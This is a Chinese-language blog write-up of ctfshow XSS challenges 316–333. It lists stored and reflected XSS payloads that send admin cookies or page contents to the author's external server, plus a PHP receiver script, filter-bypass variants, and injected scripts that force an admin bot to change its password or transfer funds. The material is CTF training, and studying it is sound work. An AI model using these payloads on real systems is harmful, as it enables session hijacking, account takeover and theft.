说来惭愧,很久没发博客了,主要是寒假有点摆了,然后ctfshow很多类型我在同时刷,这几天比如sql,xxe,php反序列化,jwt这些我就陆陆续续地能发出来了。
文末有参考WP,这两篇WP对于没学过JS的我做题用处很大,先谢过Y4师傅和bfeng师傅了!!!
316-319.
首先在自己的服务器写下接收信息的脚本:
<?php $content=$_GET[1]; if(isset($content)) { file_put_contents("1.txt",$content);} else {echo "no data input"; } ?>
或者用nc监听本地端口,但是我的服务器之前调配置有点调崩了,等我把XXS和XXE做完重置一下再弄。
然后就是对文案的操作,后台会有bot点击链接。
收集了一些姿势:
<script>document.location.href="http//byname6.com/fk/1.php?1="+document.cookie</script> #点击重定向 <script>img=document.createElement("img");img.src="http://byname6.com/fk/1.php?1="+document.cookie</script> #图片重定向 <script>window.open('http://byname6.com/fk/1.php?1=')+document.cookie</script> #window.open---浏览器打开新窗口并访问链接 <script>window.location.href="http://byname6.com/fk/1.php?1="+document.cookie</script> #window可以不加 <input οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.cookie)" autofocus> input表单里增加了js的onfocus事件,当输入框被聚焦(鼠标点击出现的一闪一闪的光标),就会访问目标链接,而后面增加了个autofocus属性,即自动聚焦到输入框,所以这个不需要用户点击就能xss。 <svg οnlοad="window.open('http://byname6.com/fk/1.php?1='+document.cookie)"> svg标签是可放缩矢量标签,onload属性是加载时触发事件。 <iframe οnlοad="window.open('http://byname6.com/fk/1.php?1='+document.cookie)"> </iframe> iframe是内联文档标签 <body οnlοad="window.open('http://byname6.com/fk/1.php?1='+document.cookie)"> </body>
320-326.过滤空格(逗号还有其它标签)
用/代替空格
input/οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.cookie)"/autofocus
或者
<input οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.cookie)" autofocus>
在空格出填充 %09(制表符) 的URL解码--->可以复制
或者用/**/
input/**/οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.cookie)"/**/autofocus
运气真好,一把梭了。。。
327.存储型开始
写祝福变成发邮件了,send要选admin,然后无脑用
<input/οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.cookie)"/autofocus>
328.登录存储窃取cookie
注册时把密码或者用户名改成上面的XSS语句,然后可以发现窃取到了管理员的COOKIE,再将PHPSESSID换成管理员的去到用户管理窗口即可得到flag。
329.cookie失效,转发页面
按上一题的来做还是无法看到flag,因为设置了每当cookie发出该cookie就会失效,所以我们的VPS接收到的东西应该是管理员能拿到的网页内容(flag),而不是管理员的cookie。
这里有两种写法(参考的文末的两篇WP)
1.document.getElementByClassName
第一种比较简单,直接根据类名来找,比如flag藏在第一排,我们就在getElementsByClassName写入第一排密码的类名layui-table-cell laytable-cell-1-0-1,且这是第一个出现的类名,就加上[1]。
innerHTML是不包括HTML标签
outerHTML是不包括HTML标签
<input οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML )" autofocus>
2.document.quertSelector()
利用到了XSS选择器quertSelector()
<input οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.quertSelector(#top>div.layui-container>div: nth-child(4)>div>div.layui-table-box>layui-table-body layui-table-main).text" autofocus>
330.让admin修改自己的密码
很有意思的一道题,当我们像上一题一样做的时候,发现返回的是一堆星号。
发现有个新的修改密码的功能,抓个包发现访问的是/api/change.php?p=这个url,于是想到可以让管理员密码修改成我们自定义的密码:
<script>window.open("127.0.0.1/api/change.php?p=byname")</script>
然后登录账号为admin,密码为byname即可拿flag
注意一定要是127.0.0.1。
331.post版330
也没什么好说的,只是要去看看js的基本语法:
<input οnfοcus="var request=new XMLHttpRequest(); request.open('POST', 'http://127.0.0.1/api/change.php', true); request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); request.send('p=byname');" autofocus>
332-333.转账
一道很好玩的题,可以看到购买flag需要9999,我们只有4元,又看到有个转账窗口,抓包发现是post请求,那么思路就来了,让管理员post请求转账链接,给我们转9999:
这道题似乎某年的极客大挑战上也有
<input οnfοcus="var request=new XMLHttpRequest();request.open('POST','http://127.0.0.1/api/amount.php',true);request.setRequestHeader('content-type','application/x-www-form-urlencoded');request.send('u=byname&a=9999')" autofocus>